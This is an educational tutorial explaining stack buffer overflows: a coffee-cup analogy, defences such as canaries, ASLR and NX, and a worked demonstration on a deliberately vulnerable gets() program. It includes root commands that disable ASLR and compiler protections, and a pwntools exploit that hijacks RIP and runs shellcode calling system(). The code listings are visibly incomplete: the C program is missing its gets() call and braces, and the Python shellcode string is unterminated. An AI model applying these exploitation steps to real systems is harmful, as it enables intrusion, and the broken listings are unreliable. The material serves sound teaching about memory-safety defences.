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Stack buffer overflow

What is a stack buffer overflow ?

A stack buffer overflow is a bug where too much bytes have been written in a very specific part of the memory: the stack.

Virtual Memory Space with stack

I'll give you an example from everyday life.
Imagine yourself in front of a coffee machine that offers you several choices including Ristretto and Latte macchiato :

22 ml of Ristretto inside a cup of 50 ml
Latte macchiatto
360 ml of Latte macchiato inside a cup of 400 ml

It is possible to have a Ristretto in a Latte macchiatto cup (because a 400 ml cup can contain 22 ml of coffee).
But if you want a Latte macchiatto in a Ristretto cup, it will overflow (because the 50 ml cup cannot hold 360 ml of coffee).

What does cybersecurity have to do with coffee ? Let's continue the analogy and identify the objects/actors :

Coffee Hacking
You take a coffee You are an attacker
A cup is used The stack is used
You use the coffee machine You use a vulnerable function
You pour coffee inside the cup using the machine You inject bytes in the stack using the vulnerable function
It overflows everywhere because the cup is not big enough It overflows because the stack is not big enough

Unlike coffee, the bytes do not overflow everywhere but they are still stored in the stack because there is always space in the memory.
The excess byte will then rewrite important data into the stack.

Is it dangerous ?

Oh yes, it is !

It can easily crash a program or a service leading to a deny-of-service, and in some cases allows the attacker to execute arbitrary code.

If there are addresses that points to executable code, it is possible to rewrite these addresses to hijack control flow : assembly instructions pop data from stack to registers and if RIP/EIP register is loaded with stack data, it is then possible to redirect execution.


It is possible to avoid stack buffer overflow in different ways:

  • Secure vulnerable functions or not use them at all It is the case of gets() function from LIBC, where it is explicitly stated in the manual : "Never use gets(). [...] Use fgets() instead."
  • Protect the binary from stack smashing : There is a protection against stack smashing which is called a canary, a random value stored in the stack before the old base pointer register value. Before leaving a function, it checks if canary value is the same as the one during initialization phase. If it is not the case, then a buffer overflow has been detected and the program stops, preventing attacker to do more damage. To protect against stack smashing, you can use argument -fstack-protector-all from GCC compiler to protect all functions in the program.
  • Randomize address space : The ASLR (Address Space Layout Randomization) is able to randomize addresses from the system. This makes finding valid addresses more difficult and prevents control flow hijacking. To activate address space randomization for both libraries and executable, you need to be root and to write the value 2 to /proc/sys/kernel/randomize_va_space file. If you want to protect only libraries, write 1.
  • Forbid the stack to be executable : The NX (No eXecute) bit forbid the area of memory where the stack is located to be executable. It is harder for attacker to find an executable memory area. To activate NX, you can use compilation argument -z noexecstack from GCC compiler.
  • Use SAST (static analysis) and DAST (dynamic analysis) tools : cppcheck [SAST], Splint [SAST], ASAN (Address Sanitizer) [DAST], ...

Give me an example of stack buffer overflow

Here is a basic piece of C source code where gets() function from LIBC is called.
It stores bytes from user standard input into main() stack :

#include <stdio.h>

void main(void)
    char buffer[12];

I compiled the 64-bit binary with GCC (LIBC linked statically) and I disabled ASLR, NX bit and canary protections :
# Disable NX from compiler               : -z execstack
# Disable canary from compiler           : -fno-stack-protector
# Disable ASLR from kernel (root needed) : echo "0" > /proc/sys/kernel/randomize_va_space 
sudo su
echo "0" > /proc/sys/kernel/randomize_va_space 
gcc vuln.c -o vuln -fno-stack-protector -z execstack

As seen previously, gets() function is vulnerable to buffer overflows. It should crash if I inject too much bytes :

Crash of ./vuln program

I used pwndbg to analyze the crash :

Debug of ./vuln crash with pwndbg

The RET instruction at address 0x555555555168 <main+31> will pop the value pointed by RSP into RIP.
It is pretty straightforward : RSP register points to "will crash", which is not a valid executable address. It crashes.

What is really happening here ? Let's disassemble main() and draw the stack to understand better :

Disassemble of main() function

There are 0x10 bytes allocated (at 0x0000555555555151 <+8>) for the stack frame of main().
The argument of gets() function is loaded into RAX register at location [RBP-0xc] (at 0x0000555555555155 <+12>).

I drew the stack for you, before and after gets() call :

Before disaster
After (string)
After disaster (String view)
After (hexadecimal)
After disaster (Hexadecimal view)

As you can see, gets() function allows to write theoretically an unlimited number of bytes. Thus, it is possible to write what we want at the location of saved RBP and RIP values in the stack.
Note that "will crash\0" has an hexadecimal value of 0x006873617263206c6c6977 (in little-endian) and RIP is written as "will cra" of hexadecimal value 0x617263206c6c6977 : because it is not a valid address (an address that points to an executable memory area), a SIGSEGV occurs, leading to a crash.

Cool exploit

From this previous example, it is even possible to execute arbitrary code using system() function from LIBC : its base address is indeed directly leaked from its virtual memory mapping because ASLR is off.
In the example below, I launched a youtube video using pwntools Python module to craft my payload :
from pwn import *

elf = ELF("./vuln",checksec=False)
p = elf.process()

offset = b'A'*20
address_of_shellcode = p64(0x7fffffffde90) 

shellcode = """
mov rax, 0x7ffff7c552b0 /* Address of system from LIBC */
mov rdi, 0x7fffffffdeb5 /* Address of command in stack */
call rax /* system("/usr/bin/firefox") */
mov rax, 0x7ffff7c452c0 /* Address of exit from LIBC */
xor rdi,rdi
call rax

command = b"/usr/bin/firefox\x00"
payload = offset + address_of_shellcode + asm(shellcode,arch="amd64") + command


And here is the beautiful result :

Funny exploit with system() function call from LIBC